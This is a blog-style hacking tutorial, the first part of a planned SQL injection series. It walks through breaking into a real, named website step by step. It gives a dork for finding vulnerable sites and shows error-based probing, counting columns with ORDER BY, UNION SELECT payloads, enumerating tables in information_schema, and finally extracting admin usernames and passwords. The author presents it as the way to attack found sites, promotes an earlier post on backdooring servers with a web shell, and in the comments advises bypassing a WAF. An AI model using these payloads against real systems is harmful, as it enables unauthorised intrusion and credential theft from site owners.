Hello my dear readers :)

I recently wrote an article about how to backdoor a server using the Weevely stealth web shell.

Now I thought I'd share a SQL injection tutorial series with you, which I've divided into 3 parts.

1. Basic SQL injection
2. WAF bypassing
3. Advanced SQL injection

And what are the requirements?

Patience to play with things, and a clever brain of course :D
Let's start Part 1 now.

First of all, you have to find a site that is vulnerable to SQL injection, for which you can use any dork. A famous one is this:

inurl:.php?id= site:com
and you'll get a huge list of sites. Let's say I got this site:
http://www.dakshindare.co.in/official.php?id=3
Now what I have to do is check whether it's vulnerable or not. Just add a single quote ( ' ) after the id parameter, so it looks like this:
http://www.dakshindare.co.in/official.php?id=3'
If you see a SQL error on the page, or any change in the page, then this site is vulnerable to SQL injection.

Here in my case I got this error:

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/dakshind/public_html/official.php on line 48
Interesting :D Now let's work out how many columns the query has. To do it, you simply add the
order by x--
command, where "x" can be any number. We check the URL and keep increasing x by 1 until we get an error again.

In my case it went like this:

  • http://www.dakshindare.co.in/official.php?id=3 order by 1-- (No Error)
Now here x=1, so keep adding 1 to it, and what I see is that I get an error on this URL:
  • http://www.dakshindare.co.in/official.php?id=3 order by 7-- (Error)
So this site has 6 columns. What we have to do now is use UNION SELECT and add a hyphen ( - ) in front of the parameter value, so the original row is not returned and the injected row shows instead. In my case:
http://www.dakshindare.co.in/official.php?id=-3 union select 1,2,3,4,5,6--

It should now show some numbers on the page. In my case it's showing:

Now 2, 3 and 4 are injectable (those are the columns whose number was printed on the page).

So what I'll do is just put
group_concat(table_name)
in one of the injectable columns and add
from information_schema.tables where table_schema=database()
after the column list.

In my case it will be:

http://www.dakshindare.co.in/official.php?id=3 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--

and the result is:


Now I want to know the admin ID and password, so I'll use the admin table. First I fetch its column names. The command should look like this:


http://www.dakshindare.co.in/official.php?id=3 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)--

and it'll list the columns of the admin table (CHAR(97, 100, 109, 105, 110) is just the word "admin" written as character codes, which avoids quotes). Now it's time to get the data from the admin table. Suppose its columns are:

  • username
  • password

So now the query should be:
http://www.dakshindare.co.in/official.php?id=3 union select 1,group_concat(username,0x3a,password),3,4,5,6 from admin--

Voila :D You can see the admin username & password on the page (0x3a is a colon, used as the separator). So guys, this is the simplest and most basic tutorial on how a SQL injection actually works.

Hope you like this article. Please share it to help us grow as well. Also, in case you don't understand what I've posted, simply comment your problem below and we'll get back to you as soon as possible :)

This post is written by Muhammad Adeel. He is a security researcher and a programmer of C++, C, Python, Ruby, HTML and a bit more ;)

3 comments:

  1. After "http://www.dakshindare.co.in/official.php?id=-3 union select 1,2,3,4,5,6--", this command the page displays this: "An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security". How to rectify this?

    Replies
    1. You need to bypass the WAF (Web Application Firewall) to reach your goal.

  2. Muhammad Adeel is a racist.